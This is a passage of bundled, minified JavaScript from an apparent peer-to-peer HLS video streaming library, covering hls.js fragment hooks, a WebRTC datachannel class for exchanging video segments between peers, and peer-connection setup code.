                                    this.hlsjs.config.p2pEnabled = this.p2pEnabled, this.bufMgr = new _['default'](this, this.config), this.hlsjs.config.bufMgr = this.bufMgr, this.media = this.hlsjs.media;
                                    var r = new y.Fetcher(this, this.config.token, window.encodeURIComponent(e), this.config.announce || '', t);
                                    this.fetcher = r, this.tracker = new y.Tracker(this, r, this.config), this.tracker.scheduler.bufferManager = this.bufMgr, this.hlsjs.config.fLoader = v['default'], window.__p2p_loader__ = {
                                        scheduler: this.tracker.scheduler,
                                        fetcher: r,
                                        p2pBlackList: this.config.p2pBlackList
                                    }, this.trackerTried = !1, this.eventListened || (this.hlsjs.on(this.HLSEvents.FRAG_LOADING, this._onFragLoading.bind(this)), this.hlsjs.on(this.HLSEvents.FRAG_LOADED, this._onFragLoaded.bind(this)), this.hlsjs.on(this.HLSEvents.FRAG_CHANGED, this._onFragChanged.bind(this)), this.hlsjs.on(this.HLSEvents.ERROR, this._onHlsError.bind(this)), this.eventListened = !0), window.addEventListener('beforeunload', function () {
                                        n.p2pEnabled && n.disableP2P();
                                    }), window.addEventListener('unload', function () {
                                        n.p2pEnabled && n.disableP2P();
                                    });
                                }
                            }
                        },
                        {
                            key: '_onFragLoading',
                            value: function value(e, t) {
                                var n = t.frag.sn;
                                (0, E.isBlockType)(t.frag.url, this.config.p2pBlackList) || (this.logger.debug('loading frag ' + n), this.emit(y.Events.FRAG_LOADING, n));
                            }
                        },
                        {
                            key: '_onFragLoaded',
                            value: function value(e, t) {
                                var n = this, r = t.frag, o = r.sn, i = r.duration;
                                if (!(0, E.isBlockType)(t.frag.url, this.config.p2pBlackList) && (this.emit(y.Events.FRAG_LOADED, o, i), this.trackerTried || this.tracker.connected || !this.config.p2pEnabled || (this.tracker.resumeP2P(), this.trackerTried = !0, this.config.useHttpRange ? fetch(t.frag.url, { headers: { Range: 'bytes=0-10' } }).then(function (e) {
                                        206 === e.status && (n.config.httpRangeSupported = !0, n.logger.info('http range request is supported'));
                                    })['catch'](function (e) {
                                        n.config.httpRangeSupported = !1, n.logger.error('http range request is not supported');
                                    }) : this.config.httpRangeSupported = !1), this.config.p2pEnabled && this.bufMgr.hasSegOfSN(o + 1))) {
                                    var a = this.bufMgr.getSegbySN(o + 1).level;
                                    this.hlsjs.nextLoadLevel = a;
                                }
                            }
                        },
                        {
                            key: '_onFragChanged',
                            value: function value(e, t) {
                                if (!(0, E.isBlockType)(t.frag.url, this.config.p2pBlackList)) {
                                    this.logger.debug('frag changed: ' + t.frag.sn);
                                    var n = t.frag, r = n.sn, o = n.duration;
                                    this.emit(y.Events.FRAG_CHANGED, r, o);
                                }
                            }
                        },
                        {
                            key: '_onHlsError',
                            value: function value(e, t) {
                                t.fatal ? console.error(t.type + ' details ' + t.details + ' reason ' + t.reason) : console.warn(t.type + ' details ' + t.details + ' reason ' + t.reason);
                                var n = this.hlsjs.constructor.ErrorDetails;
                                switch (t.details) {
                                case n.BUFFER_STALLED_ERROR:
                                    this.fetcher && this.fetcher.errsBufStalled++;
                                    break;
                                case n.INTERNAL_EXCEPTION:
                                    this.fetcher && (this.fetcher.errsInternalExpt++, this.fetcher.exptMsg = t.err.message), this.logger.error('INTERNAL_EXCEPTION event ' + t.event + ' err ' + t.err.message);
                                }
                            }
                        },
                        {
                            key: 'disableP2P',
                            value: function value() {
                                this.logger && this.logger.warn('disable P2P'), this.removeAllListeners(), this.p2pEnabled && (this.p2pEnabled = !1, this.config.p2pEnabled = this.hlsjs.config.p2pEnabled = this.p2pEnabled, this.tracker && (this.tracker.stopP2P(), this.tracker = {}, this.fetcher = null, this.bufMgr.destroy(), this.bufMgr = null, this.hlsjs.config.fLoader = this.hlsjs.constructor.DefaultConfig.loader));
                            }
                        },
                        {
                            key: 'enableP2P',
                            value: function value() {
                                return this.p2pEnabled ? null : (this.logger.info('enable P2P'), this.p2pEnabled = !0, this.config.p2pEnabled = this.hlsjs.config.p2pEnabled = this.p2pEnabled, this._init(this.channel, this.browserInfo), this);
                            }
                        },
                        {
                            key: 'destroy',
                            value: function value() {
                                this.disableP2P(), this.removeAllListeners();
                            }
                        },
                        {
                            key: 'version',
                            get: function get() {
                                return t.version;
                            }
                        }
                    ], [{
                            key: 'isSupported',
                            value: function value() {
                                var e = (0, y.getBrowserRTC)();
                                return e && void 0 !== e.RTCPeerConnection.prototype.createDataChannel;
                            }
                        }]), t;
                }(l['default']);
            O.version = '1.6.1', O.protocolVersion = 'v3', t['default'] = O, e.exports = t['default'];
        },
        function (e, t, n) {
            'use strict';
            Object.defineProperty(t, '__esModule', { value: !0 });
            var r = Object.assign || function (e) {
                    for (var t = 1; t < arguments.length; t++) {
                        var n = arguments[t];
                        for (var r in n) {
                            Object.prototype.hasOwnProperty.call(n, r) && (e[r] = n[r]);
                        }
                    }
                    return e;
                }, o = n(2), i = r({
                    p2pBlackList: [
                        'aac',
                        'mp3',
                        'vtt',
                        'webvtt',
                        'key'
                    ]
                }, o.config);
            i.segmentId = function (e, t, n) {
                return '' + n.split('?')[0];
            }, t['default'] = i, e.exports = t['default'];
        },
        function (e, t, n) {
            'use strict';
            function r(e) {
                return e && e.__esModule ? e : { 'default': e };
            }
            function o(e, t) {
                if (!(e instanceof t))
                    throw new TypeError('Cannot call a class as a function');
            }
            function i(e, t) {
                if (!e)
                    throw new ReferenceError('this hasn\'t been initialised - super() hasn\'t been called');
                return !t || 'object' != _typeof(t) && 'function' != typeof t ? e : t;
            }
            function a(e, t) {
                if ('function' != typeof t && null !== t)
                    throw new TypeError('Super expression must either be null or a function, not ' + _typeof(t));
                e.prototype = Object.create(t && t.prototype, {
                    constructor: {
                        value: e,
                        enumerable: !1,
                        writable: !0,
                        configurable: !0
                    }
                }), t && (Object.setPrototypeOf ? Object.setPrototypeOf(e, t) : e.__proto__ = t);
            }
            function s(e, t, n, r) {
                var o = [];
                if (r) {
                    for (var i = void 0, a = 0; a < n - 1; a++) {
                        i = e.slice(a * t, (a + 1) * t), o.push(i);
                    }
                    i = e.slice(e.byteLength - r, e.byteLength), o.push(i);
                } else
                    for (var s = void 0, c = 0; c < n; c++) {
                        s = e.slice(c * t, (c + 1) * t), o.push(s);
                    }
                return o;
            }
            Object.defineProperty(t, '__esModule', { value: !0 });
            var c = Object.assign || function (e) {
                    for (var t = 1; t < arguments.length; t++) {
                        var n = arguments[t];
                        for (var r in n) {
                            Object.prototype.hasOwnProperty.call(n, r) && (e[r] = n[r]);
                        }
                    }
                    return e;
                }, u = function () {
                    function e(e, t) {
                        for (var n = 0; n < t.length; n++) {
                            var r = t[n];
                            r.enumerable = r.enumerable || !1, r.configurable = !0, 'value' in r && (r.writable = !0), Object.defineProperty(e, r.key, r);
                        }
                    }
                    return function (t, n, r) {
                        return n && e(t.prototype, n), r && e(t, r), t;
                    };
                }(), l = n(11), f = r(l), d = n(0), h = r(d), p = n(4), g = r(p), v = n(1), y = n(6).Buffer, m = 65536, _ = function (e) {
                    function t(e, n, r, a, s) {
                        o(this, t);
                        var u = i(this, (t.__proto__ || Object.getPrototypeOf(t)).call(this));
                        return u.engine = e, u.channel = e.fetcher.channelId, u.logger = e.logger, u.config = s, u.remotePeerId = r, u.channelId = a ? n + '-' + r : r + '-' + n, u.platform = 'unknown', u.connected = !1, u.msgQueue = [], u.miss = 0, u.bufArr = [], u.packetSize = m, u.connTimeout = window.setTimeout(function () {
                            u.logger.info('dc ' + u.channelId + ' connection timeout'), u.emit(g['default'].DC_ERROR);
                        }, 30000), u.rcvdReqQueue = [], u.uploading = !1, u.choked = !1, u.timeSendRequest = 0, u.weight = 0, u.times = 0, u.delays = [], u._datachannel = new f['default'](c({
                            initiator: a,
                            channelName: u.channelId,
                            objectMode: !0
                        }, u.config.webRTCConfig)), u.isInitiator = a, u._init(u._datachannel), u.downloadNum = 0, u.dataExchangeTs = (0, v.getCurrentTs)(), u.startSN = Number.MAX_SAFE_INTEGER, u.endSN = -1, u;
                    }
                    return a(t, e), u(t, null, [{
                            key: 'VERSION',
                            get: function get() {
                                return 'v3';
                            }
                        }]), u(t, [
                        {
                            key: '_init',
                            value: function value(e) {
                                var t = this;
                                e.on('error', function (e) {
                                    t.emit(g['default'].DC_ERROR);
                                }), e.on('signal', function (e) {
                                    t.emit(g['default'].DC_SIGNAL, e);
                                });
                                var n = function n() {
                                    for (t.logger.info('datachannel CONNECTED to ' + t.remotePeerId), t.connected = !0, window.clearTimeout(t.connTimeout), t.emit(g['default'].DC_OPEN); t.msgQueue.length > 0;) {
                                        var e = t.msgQueue.shift();
                                        t.emit(e.event, e);
                                    }
                                };
                                e.once('connect', n), e.on('data', function (e) {
                                    if ('string' == typeof e) {
                                        t.logger.debug('datachannel receive string: ' + e + ' from ' + t.remotePeerId);
                                        var n = JSON.parse(e);
                                        if (!t.connected)
                                            return void t.msgQueue.push(n);
                                        switch (n.event) {
                                        case g['default'].DC_HAVE:
                                            if (t.emit(n.event, n), !n.sn || t.config.live)
                                                return;
                                            n.sn < t.startSN && (t.startSN = n.sn), n.sn > t.endSN && (t.endSN = n.sn);
                                            break;
                                        case g['default'].DC_PIECE:
                                            t._prepareForBinary(n.attachments, n.seg_id, n.sn, n.size, n.level), t.emit(n.event, n);
                                            break;
                                        case g['default'].DC_PIECE_NOT_FOUND:
                                            t.downloadNum >= 0 && t.downloadNum--, t.emit(n.event, n);
                                            break;
                                        case g['default'].DC_REQUEST:
                                            t._handleRequestMsg(n);
                                            break;
                                        case g['default'].DC_PIECE_ACK:
                                            t._handlePieceAck(), t.emit(n.event, n);
                                            break;
                                        case g['default'].DC_METADATA:
                                            var r = n.channel;
                                            if (!r)
                                                return t.logger.error('peer channel ' + r + ' is null!'), void t.emit(g['default'].DC_ERROR);
                                            if (t.channel !== r)
                                                return t.logger.error('peer channel ' + r + ' not matched!'), void t.emit(g['default'].DC_ERROR);
                                            switch (n.platform) {
                                            case g['default'].DC_PLAT_ANDROID:
                                                t.platform = g['default'].DC_PLAT_ANDROID;
                                                break;
                                            case g['default'].DC_PLAT_IOS:
                                                t.platform = g['default'].DC_PLAT_IOS;
                                                break;
                                            case g['default'].DC_PLAT_WEB:
                                                t.platform = g['default'].DC_PLAT_WEB;
                                            }
                                            if (t.logger.info(t.remotePeerId + ' platform ' + t.platform), t.emit(n.event, n), !n.field || t.config.live)
                                                return;
                                            n.field.forEach(function (e) {
                                                e > 0 && (e < t.startSN && (t.startSN = e), e > t.endSN && (t.endSN = e));
                                            });
                                            break;
                                        case g['default'].DC_CHOKE:
                                            t.logger.info('choke peer ' + t.remotePeerId), t.choked = !0;
                                            break;
                                        case g['default'].DC_UNCHOKE:
                                            t.logger.info('unchoke peer ' + t.remotePeerId), t.choked = !1;
                                            break;
                                        default:
                                            t.emit(n.event, n);
                                        }
                                    } else if (t.bufArr.push(e), 0 === --t.remainAttachments) {
                                        var o = t.expectedSize / (performance.now() - t.timeSendRequest), i = t.weight * t.times;
                                        t.weight = (i + o) / ++t.times, t.downloadNum >= 0 && t.downloadNum--, t.sendJson({
                                            event: g['default'].DC_PIECE_ACK,
                                            sn: t.bufSN,
                                            seg_id: t.segId,
                                            size: t.expectedSize
                                        }), t._handleBinaryData();
                                    }
                                }), e.once('close', function () {
                                    t.emit(g['default'].DC_CLOSE);
                                });
                            }
                        },
                        {
                            key: 'sendJson',
                            value: function value(e) {
                                this.send(JSON.stringify(e));
                            }
                        },
                        {
                            key: 'send',
                            value: function value(e) {
                                if (this._datachannel && this._datachannel.connected)
                                    try {
                                        this._datachannel.send(e);
                                    } catch (e) {
                                        this.logger.warn('datachannel ' + this.channelId + ' send data failed, close it'), this.emit(g['default'].DC_ERROR);
                                    }
                            }
                        },
                        {
                            key: 'sendBitField',
                            value: function value(e) {
                                this.sendJson({
                                    event: g['default'].DC_METADATA,
                                    field: e,
                                    platform: g['default'].DC_PLAT_WEB,
                                    channel: this.channel
                                });
                            }
                        },
                        {
                            key: 'sendBuffer',
                            value: function value(e, t, n, r) {
                                this.uploading = !0;
                                var o = r.byteLength, i = 0, a = 0;
                                o % this.packetSize == 0 ? a = o / this.packetSize : (a = Math.floor(o / this.packetSize) + 1, i = o % this.packetSize);
                                var c = {
                                    event: g['default'].DC_PIECE,
                                    attachments: a,
                                    seg_id: n,
                                    sn: e,
                                    level: t,
                                    size: o
                                };
                                this.sendJson(c);
                                for (var u = s(r, this.packetSize, a, i), l = 0; l < u.length; l++) {
                                    this.send(u[l]);
                                }
                            }
                        },
                        {
                            key: 'requestDataById',
                            value: function value(e, t) {
                                var n = arguments.length > 2 && void 0 !== arguments[2] && arguments[2];
                                this.downloadNum++;
                                var r = {
                                    event: g['default'].DC_REQUEST,
                                    seg_id: e,
                                    sn: t,
                                    urgent: n
                                };
                                this.sendJson(r), this.timeSendRequest = performance.now(), this.dataExchangeTs = (0, v.getCurrentTs)();
                            }
                        },
                        {
                            key: 'requestDataBySN',
                            value: function value(e) {
                                var t = arguments.length > 1 && void 0 !== arguments[1] && arguments[1];
                                this.downloadNum++;
                                var n = {
                                    event: g['default'].DC_REQUEST,
                                    sn: e,
                                    urgent: t
                                };
                                this.sendJson(n), this.timeSendRequest = performance.now(), this.dataExchangeTs = (0, v.getCurrentTs)();
                            }
                        },
                        {
                            key: 'close',
                            value: function value() {
                                this.emit(g['default'].DC_CLOSE);
                            }
                        },
                        {
                            key: 'receiveSignal',
                            value: function value(e) {
                                this._datachannel.signal(e);
                            }
                        },
                        {
                            key: 'destroy',
                            value: function value() {
                                this.logger.info('destroy datachannel ' + this.channelId), this.chokeTimer && clearTimeout(this.chokeTimer), this.connTimeout && clearTimeout(this.connTimeout);
                                var e = { event: g['default'].DC_CLOSE };
                                this.sendJson(e), this._datachannel.removeAllListeners(), this.removeAllListeners(), this._datachannel.destroy();
                            }
                        },
                        {
                            key: '_handleRequestMsg',
                            value: function value(e) {
                                this.uploading || this.rcvdReqQueue.length > 0 ? (this.logger.info('add request sn ' + e.sn + ' to rcvdReqQueue'), e.urgent ? this.rcvdReqQueue.push(e.sn) : this.rcvdReqQueue.unshift(e.sn)) : this.emit(g['default'].DC_REQUEST, e), this.dataExchangeTs = (0, v.getCurrentTs)();
                            }
                        },
                        {
                            key: '_handlePieceAck',
                            value: function value() {
                                this.uploading = !1;
                                var e = this.getRequestFromQueue();
                                e && this.emit(g['default'].DC_REQUEST, { sn: e });
                            }
                        },
                        {
                            key: '_prepareForBinary',
                            value: function value(e, t, n, r, o) {
                                this.bufArr = [], this.remainAttachments = e, this.segId = t, this.level = o, this.bufSN = n, this.expectedSize = r;
                            }
                        },
                        {
                            key: '_handleBinaryData',
                            value: function value() {
                                var e = y.concat(this.bufArr);
                                if (e.byteLength == this.expectedSize) {
                                    this.engine.fetcher ? this.engine.fetcher.reportDCTraffic(this.expectedSize) : this.logger.error('DC report failed');
                                    var t = new Uint8Array(e).buffer;
                                    this.emit(g['default'].DC_RESPONSE, {
                                        seg_id: this.segId,
                                        sn: this.bufSN,
                                        data: t,
                                        level: this.level
                                    });
                                } else
                                    this.logger.error('expectedSize ' + this.expectedSize + ' not equal to byteLength ' + e.byteLength);
                                this.logger.info('datachannel finish downloading ' + this.segId + ' from ' + this.remotePeerId), this.segId = '', this.bufArr = [], this.expectedSize = -1;
                            }
                        },
                        {
                            key: 'loadtimeout',
                            value: function value() {
                                var e = this;
                                if (this.logger.info('datachannel timeout while downloading from ' + this.remotePeerId), this.emit(g['default'].DC_TIMEOUT), ++this.miss >= 4 && !this.choked) {
                                    this.choked = !0;
                                    var t = 10 * this.miss;
                                    this.logger.warn('datachannel ' + this.channelId + ' is choked'), t <= 150 && (this.chokeTimer = setTimeout(function () {
                                        e.choked = !1, e.logger.warn('datachannel ' + e.channelId + ' is unchoked');
                                    }, 1000 * t));
                                }
                            }
                        },
                        {
                            key: 'getRequestFromQueue',
                            value: function value() {
                                if (0 === this.rcvdReqQueue.length)
                                    return null;
                                var e = this.rcvdReqQueue.pop();
                                return this.logger.info('rcvdReqQueue pop ' + e), this.bitset.has(e) ? (this.logger.info('peer already has ' + e + ', notify peer'), this.sendJson({
                                    event: g['default'].DC_PIECE_NOT_FOUND,
                                    sn: e
                                }), this.getRequestFromQueue()) : e;
                            }
                        },
                        {
                            key: 'isAvailable',
                            get: function get() {
                                return this.downloadNum < 2 && !1 === this.choked;
                            }
                        },
                        {
                            key: 'isAvailableUrgently',
                            get: function get() {
                                return 0 === this.downloadNum && !1 === this.choked;
                            }
                        }
                    ]), t;
                }(h['default']);
            t['default'] = _, e.exports = t['default'];
        },
        function (e, t, n) {
            'use strict';
            function r(e) {
                for (var t = '', n = 0; n < e.length; ++n) {
                    t += e[n].toString(16).padStart(2, '0');
                }
                return t;
            }
            function o(e) {
                var t = this;
                if (!(t instanceof o))
                    return new o(e);
                c.call(t), t.channelName = e.initiator ? e.channelName || r(l(20)) : null, t._isChromium = 'undefined' != typeof window && !!window.webkitRTCPeerConnection, t.initiator = e.initiator || !1, t.channelConfig = e.channelConfig || o.channelConfig, t.channelConfig.negotiated = !1, t.channelConfig.ordered = !0, t.channelConfig.maxRetransmits = 30, t.config = e.config || o.config, t.constraints = t._transformConstraints(e.constraints || o.constraints), t.offerConstraints = t._transformConstraints(e.offerConstraints || {}), t.answerConstraints = t._transformConstraints(e.answerConstraints || {}), t.sdpTransform = e.sdpTransform || function (e) {
                    return e;
                }, t.streams = e.streams || (e.stream ? [e.stream] : []), t.trickle = void 0 === e.trickle || e.trickle, t.destroyed = !1, t.connected = !1, t.remoteAddress = void 0, t.remoteFamily = void 0, t.remotePort = void 0, t.localAddress = void 0, t.localPort = void 0, t._wrtc = e.wrtc && 'object' === s(e.wrtc) ? e.wrtc : window, t._pcReady = !1, t._channelReady = !1, t._iceComplete = !1, t._channel = null, t._pendingCandidates = [], t._isNegotiating = !1, t._batchedNegotiation = !1, t._queuedNegotiation = !1, t._sendersAwaitingStable = [], t._senderMap = new WeakMap(), t._remoteTracks = [], t._remoteStreams = [], t._chunk = null, t._cb = null, t._interval = null, t._pc = new t._wrtc.RTCPeerConnection(t.config, t.constraints), t._isReactNativeWebrtc = 'number' == typeof t._pc._peerConnectionId, t._pc.oniceconnectionstatechange = function () {
                    t._onIceStateChange();
                }, t._pc.onicegatheringstatechange = function () {
                    t._onIceStateChange();
                }, t._pc.onsignalingstatechange = function () {
                    t._onSignalingStateChange();
                }, t._pc.onicecandidate = function (e) {
                    t._onIceCandidate(e);
                }, t.initiator ? t._setupData({ channel: t._pc.createDataChannel(t.channelName, t.channelConfig) }) : t._pc.ondatachannel = function (e) {
                    t._setupData(e);
                }, 'addTrack' in t._pc && (t.streams && t.streams.forEach(function (e) {
                    t.addStream(e);
                }), t._pc.ontrack = function (e) {
                    t._onTrack(e);
                }), t.initiator && t._needsNegotiation();
            }
            function i(e, t) {
                var n = new Error(e);
                return n.code = t, n;
            }
            function a() {
            }
            var s = 'function' == typeof Symbol && 'symbol' == _typeof(Symbol.iterator) ? function (e) {
                return _typeof(e);
            } : function (e) {
                return e && 'function' == typeof Symbol && e.constructor === Symbol && e !== Symbol.prototype ? 'symbol' : _typeof(e);
            };
            e.exports = o;
            var c = n(0), u = n(12), l = function l(e) {
                    var t = new Uint8Array(e);
                    return window.crypto.getRandomValues(t), t;
                };
            String.prototype.padStart || (String.prototype.padStart = function (e, t) {
                return e >>= 0, t = String(void 0 !== t ? t : ' '), this.length > e || '' === t ? String(this) : (e -= this.length, e > t.length && (t += t.repeat(e / t.length)), t.slice(0, e) + String(this));
            }), u(o, c), o.config = {
                iceServers: [
                    { urls: 'stun:stun.l.google.com:19302' },
                    { urls: 'stun:global.stun.twilio.com:3478?transport=udp' }
                ]
            }, o.constraints = {}, o.channelConfig = {}, Object.defineProperty(o.prototype, 'bufferSize', {
                get: function get() {
                    var e = this;
                    return e._channel && e._channel.bufferedAmount || 0;
                }
            }), o.prototype.address = function () {
                var e = this;
                return {
                    port: e.localPort,
                    family: 'IPv4',
                    address: e.localAddress
                };
            }, o.prototype.signal = function (e) {
                var t = this;
                if (t.destroyed)
                    throw i('cannot signal after peer is destroyed', 'ERR_SIGNALING');
                if ('string' == typeof e)
                    try {
                        e = JSON.parse(e);
                    } catch (t) {
                        e = {};
                    }
                e.renegotiate && t._needsNegotiation(), e.candidate && (t._pc.remoteDescription && t._pc.remoteDescription.type ? t._addIceCandidate(e.candidate) : t._pendingCandidates.push(e.candidate)), e.sdp && t._pc.setRemoteDescription(new t._wrtc.RTCSessionDescription(e), function () {
                    t.destroyed || (t._pendingCandidates.forEach(function (e) {
                        t._addIceCandidate(e);
                    }), t._pendingCandidates = [], 'offer' === t._pc.remoteDescription.type && t._createAnswer());
                }, function (e) {
                    t.destroy(i(e, 'ERR_SET_REMOTE_DESCRIPTION'));
                }), e.sdp || e.candidate || e.renegotiate || t.destroy(i('signal() called with invalid signal data', 'ERR_SIGNALING'));
            }, o.prototype._addIceCandidate = function (e) {
                var t = this;
                try {
                    t._pc.addIceCandidate(new t._wrtc.RTCIceCandidate(e), a, function (e) {
                        t.destroy(i(e, 'ERR_ADD_ICE_CANDIDATE'));
                    });
                } catch (e) {
                    t.destroy(i('error adding candidate: ' + e.message, 'ERR_ADD_ICE_CANDIDATE'));
                }
            }, o.prototype.send = function (e) {
                this._channel.send(e);
            }, o.prototype.addStream = function (e) {
                var t = this;
                e.getTracks().forEach(function (n) {
                    t.addTrack(n, e);
                });
            }, o.prototype.addTrack = function (e, t) {
                var n = this, r = n._pc.addTrack(e, t), o = n._senderMap.get(e) || new WeakMap();
                o.set(t, r), n._senderMap.set(e, o), n._needsNegotiation();
            }, o.prototype.removeTrack = function (e, t) {
                var n = this, r = n._senderMap.get(e), o = r ? r.get(t) : null;
                o || n.destroy(new Error('Cannot remove track that was never added.'));
                try {
                    n._pc.removeTrack(o);
                } catch (e) {
                    'NS_ERROR_UNEXPECTED' === e.name ? n._sendersAwaitingStable.push(o) : n.destroy(e);
                }
            }, o.prototype.removeStream = function (e) {
                var t = this;
                e.getTracks().forEach(function (n) {
                    t.removeTrack(n, e);
                });
            }, o.prototype._needsNegotiation = function () {
                var e = this;
                e._batchedNegotiation || (e._batchedNegotiation = !0, setTimeout(function () {
                    e._batchedNegotiation = !1, e.negotiate();
                }, 0));
            }, o.prototype.negotiate = function () {
                var e = this;
                e.initiator ? e._isNegotiating ? e._queuedNegotiation = !0 : e._createOffer() : e.emit('signal', { renegotiate: !0 }), e._isNegotiating = !0;
            }, o.prototype.destroy = function (e) {
                var t = this;
                if (!t.destroyed) {
                    if (t.destroyed = !0, t.connected = !1, t._pcReady = !1, t._channelReady = !1, t._remoteTracks = null, t._remoteStreams = null, t._senderMap = null, clearInterval(t._interval), t._interval = null, t._chunk = null, t._cb = null, t._channel) {
                        try {
                            t._channel.close();
                        } catch (e) {
                        }
                        t._channel.onmessage = null, t._channel.onopen = null, t._channel.onclose = null, t._channel.onerror = null;
                    }
                    if (t._pc) {
                        try {
                            t._pc.close();
                        } catch (e) {
                        }
                        t._pc.oniceconnectionstatechange = null, t._pc.onicegatheringstatechange = null, t._pc.onsignalingstatechange = null, t._pc.onicecandidate = null, 'addTrack' in t._pc && (t._pc.ontrack = null), t._pc.ondatachannel = null;
                    }
                    t._pc = null, t._channel = null, e && t.emit('error', e), t.emit('close');
                }
            }, o.prototype._setupData = function (e) {
                var t = this;
                if (!e.channel)
                    return t.destroy(i('Data channel event is missing `channel` property', 'ERR_DATA_CHANNEL'));
                t._channel = e.channel, t._channel.binaryType = 'arraybuffer', 'number' == typeof t._channel.bufferedAmountLowThreshold && (t._channel.bufferedAmountLowThreshold = 65536), t.channelName = t._channel.label, t._channel.onmessage = function (e) {
                    t._onChannelMessage(e);
                }, t._channel.onbufferedamountlow = function () {
                    t._onChannelBufferedAmountLow();
                }, t._channel.onopen = function () {
                    t._onChannelOpen();
                }, t._channel.onclose = function () {
                    t._onChannelClose();
                }, t._channel.onerror = function (e) {
                    t.destroy(i(e, 'ERR_DATA_CHANNEL'));
                };
            }, o.prototype._createOffer = function () {
                var e = this;
                e.destroyed || e._pc.createOffer(e.offerConstraints).then(function (t) {
                    function n() {
                        e.destroyed || (e.trickle || e._iceComplete ? o() : e.once('_iceComplete', o));
                    }
                    function r(t) {
                        e.destroy(i(t, 'ERR_SET_LOCAL_DESCRIPTION'));
                    }
                    function o() {
                        var n = e._pc.localDescription || t;
                        e.emit('signal', {
                            type: n.type,
                            sdp: n.sdp
                        });
                    }
                    e.destroyed || (t.sdp = e.sdpTransform(t.sdp), e._pc.setLocalDescription(t).then(n)['catch'](r));
                })['catch'](function (t) {
                    e.destroy(i(t, 'ERR_CREATE_OFFER'));
                });
            }, o.prototype._createAnswer = function () {
                var e = this;
                e.destroyed || e._pc.createAnswer(e.answerConstraints).then(function (t) {
                    function n() {
                        e.destroyed || (e.trickle || e._iceComplete ? o() : e.once('_iceComplete', o));
                    }
                    function r(t) {
                        e.destroy(i(t, 'ERR_SET_LOCAL_DESCRIPTION'));
                    }
                    function o() {
                        var n = e._pc.localDescription || t;
                        e.emit('signal', {
                            type: n.type,
                            sdp: n.sdp
                        });
                    }
                    e.destroyed || (t.sdp = e.sdpTransform(t.sdp), e._pc.setLocalDescription(t).then(n)['catch'](r));
                })['catch'](function (t) {
                    e.destroy(i(t, 'ERR_CREATE_ANSWER'));
                });
            }, o.prototype._onIceStateChange = function () {
                var e = this;
                if (!e.destroyed) {
                    var t = e._pc.iceConnectionState, n = e._pc.iceGatheringState;
                    e.emit('iceStateChange', t, n), 'connected' !== t && 'completed' !== t || (e._pcReady = !0, e._maybeReady()), 'failed' === t && e.destroy(i('Ice connection failed.', 'ERR_ICE_CONNECTION_FAILURE')), 'closed' === t && e.destroy(new Error('Ice connection closed.'));
                }
            }, o.prototype.getStats = function (e) {
                var t = this;
                0 === t._pc.getStats.length ? t._pc.getStats().then(function (t) {
                    var n = [];
                    t.forEach(function (e) {
                        n.push(e);
                    }), e(null, n);
                }, function (t) {
                    e(t);
                }) : t._isReactNativeWebrtc ? t._pc.getStats(null, function (t) {
                    var n = [];
                    t.forEach(function (e) {
                        n.push(e);
                    }), e(null, n);
                }, function (t) {
                    e(t);
                }) : t._pc.getStats.length > 0 ? t._pc.getStats(function (n) {
                    if (!t.destroyed) {
                        var r = [];
                        n.result().forEach(function (e) {
                            var t = {};
                            e.names().forEach(function (n) {
                                t[n] = e.stat(n);
                            }), t.id = e.id, t.type = e.type, t.timestamp = e.timestamp, r.push(t);
                        }), e(null, r);
                    }
                }, function (t) {
                    e(t);
                }) : e(null, []);
            }, o.prototype._maybeReady = function () {
                function e() {
                    t.destroyed || t.getStats(function (n, r) {
                        function o(e) {
                            u = !0;
                            var n = s[e.localCandidateId];
                            n && n.ip ? (t.localAddress = n.ip, t.localPort = Number(n.port)) : n && n.ipAddress ? (t.localAddress = n.ipAddress, t.localPort = Number(n.portNumber)) : 'string' == typeof e.googLocalAddress && (n = e.googLocalAddress.split(':'), t.localAddress = n[0], t.localPort = Number(n[1]));
                            var r = a[e.remoteCandidateId];
                            r && r.ip ? (t.remoteAddress = r.ip, t.remotePort = Number(r.port)) : r && r.ipAddress ? (t.remoteAddress = r.ipAddress, t.remotePort = Number(r.portNumber)) : 'string' == typeof e.googRemoteAddress && (r = e.googRemoteAddress.split(':'), t.remoteAddress = r[0], t.remotePort = Number(r[1])), t.remoteFamily = 'IPv4';
                        }
                        if (!t.destroyed) {
                            n && (r = []);
                            var a = {}, s = {}, c = {}, u = !1;
                            if (r.forEach(function (e) {
                                    'remotecandidate' !== e.type && 'remote-candidate' !== e.type || (a[e.id] = e), 'localcandidate' !== e.type && 'local-candidate' !== e.type || (s[e.id] = e), 'candidatepair' !== e.type && 'candidate-pair' !== e.type || (c[e.id] = e);
                                }), r.forEach(function (e) {
                                    'transport' === e.type && e.selectedCandidatePairId && o(c[e.selectedCandidatePairId]), ('googCandidatePair' === e.type && 'true' === e.googActiveConnection || ('candidatepair' === e.type || 'candidate-pair' === e.type) && e.selected) && o(e);
                                }), !(u || Object.keys(c).length && !Object.keys(s).length))
                                return void setTimeout(e, 100);
                            if (t._connecting = !1, t.connected = !0, t._chunk) {
                                try {
                                    t.send(t._chunk);
                                } catch (n) {
                                    return t.destroy(i(n, 'ERR_DATA_CHANNEL'));
                                }
                                t._chunk = null;
                                var l = t._cb;
                                t._cb = null, l(null);
                            }
                            'number' != typeof t._channel.bufferedAmountLowThreshold && (t._interval = setInterval(function () {
                                t._onInterval();
                            }, 150), t._interval.unref && t._interval.unref()), t.emit('connect');
                        }
                    });
                }
                var t = this;
                !t.connected && !t._connecting && t._pcReady && t._channelReady && (t._connecting = !0, e());
            }, o.prototype._onInterval = function () {
                var e = this;
                !e._cb || !e._channel || e._channel.bufferedAmount > 65536 || e._onChannelBufferedAmountLow();
            }, o.prototype._onSignalingStateChange = function () {
                var e = this;
                e.destroyed || ('stable' === e._pc.signalingState && (e._isNegotiating = !1, e._sendersAwaitingStable.forEach(function (t) {
                    e.removeTrack(t), e._queuedNegotiation = !0;
                }), e._sendersAwaitingStable = [], e._queuedNegotiation && (e._queuedNegotiation = !1, e._needsNegotiation()), e.emit('negotiate')), e.emit('signalingStateChange', e._pc.signalingState));
            }, o.prototype._onIceCandidate = function (e) {
                var t = this;
                t.destroyed || (e.candidate && t.trickle ? t.emit('signal', {
                    candidate: {
                        candidate: e.candidate.candidate,
                        sdpMLineIndex: e.candidate.sdpMLineIndex,
                        sdpMid: e.candidate.sdpMid
                    }
                }) : e.candidate || (t._iceComplete = !0, t.emit('_iceComplete')));
            }, o.prototype._onChannelMessage = function (e) {
                var t = this;
                if (!t.destroyed) {
                    var n = e.data;
                    n instanceof ArrayBuffer && (n = new Uint8Array(n)), t.emit('data', n);
                }
